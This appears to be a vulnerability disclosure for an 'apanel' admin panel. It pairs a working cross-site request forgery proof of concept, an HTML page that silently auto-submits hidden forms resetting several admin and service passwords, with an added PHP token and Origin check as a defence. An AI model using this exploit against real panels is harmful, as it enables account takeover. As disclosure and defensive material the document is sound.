PoC:
<html>
<head>
<script type="text/javascript">
window.onload = function() {
    var url = 'http://localhost/apanel';
    var xsrs = [
        {
            "action": url + "/apsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "apuser", "value": "new_username" },
                { "name": "appass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/psetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "puser", "value": "new_username" },
                { "name": "ppass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/sslpsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "puser", "value": "new_username" },
                { "name": "ppass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        },
        {
            "action": url + "/mqsetup.php",
            "method": "post",
            "submitCall": "document.forms[0].submit.click()",
            "fields": [
                { "name": "qpass", "value": "new_password" },
                { "name": "submit", "value": "Change", "type": "submit" }
            ]
        }
    ];
    for (var x = 0; x < xsrs.length; x++) {
        var attackFrame = document.createElement('iframe');
        var html = '<html><body><form action="' + xsrs[x].action + '" ' +
            'method="' + xsrs[x].method + '">';
        for (var y = 0; y < xsrs[x].fields.length; y++) {
            html += '<input type="' +
                (xsrs[x].fields[y].type != null ?
                    xsrs[x].fields[y].type : 'hidden') + '" ' +
                'name="' + xsrs[x].fields[y].name + '" ' +
                'value="' + xsrs[x].fields[y].value + '" />';
        }
        html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';
        document.body.appendChild(attackFrame);
        attackFrame.contentDocument.write(html);
    }
}
</script>
</head>
<body>
</body>
</html>
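
Each request in the PoC succeeds only if the setup pages accept a POST that carries nothing but the field values. The following is an added example of a server-side check that rejects such forged requests; it is not part of the original post and not the application's own code. The function names, the `csrf_token` field and the `http://localhost` origin are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (added example, not the application's code).

/** Issue one random token per session; embed it as a hidden field in every settings form. */
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Decide whether a state-changing request may proceed.
 * $server is $_SERVER, $post is $_POST, $session is $_SESSION;
 * $allowedOrigin is the panel's own origin (assumed value below).
 */
function csrf_request_allowed(array $server, array $post, array $session, string $allowedOrigin): bool
{
    // Settings changes must never be accepted over GET.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // If the browser sent an Origin header, it must be our own origin.
    // A form auto-submitted from another site carries that site's origin.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $allowedOrigin) {
        return false;
    }
    // The posted token must match the session token (constant-time compare).
    $expected = $session['csrf_token'] ?? '';
    $posted   = $post['csrf_token'] ?? '';
    return is_string($posted) && $expected !== '' && hash_equals($expected, $posted);
}

// Constructed sample requests, shaped like the apsetup.php POST in the PoC.
$session = [];
$token   = csrf_issue_token($session);
$origin  = 'http://localhost';

$forged = ['apuser' => 'new_username', 'appass' => 'new_password', 'submit' => 'Change'];
$legit  = $forged + ['csrf_token' => $token];

var_dump(csrf_request_allowed(   // cross-site form, no token
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'], $forged, $session, $origin));
var_dump(csrf_request_allowed(   // same-origin form carrying the session token
    ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $origin], $legit, $session, $origin));
```

Setting the `SameSite` attribute on the session cookie adds a second layer, since the browser then withholds the cookie from cross-site form submissions.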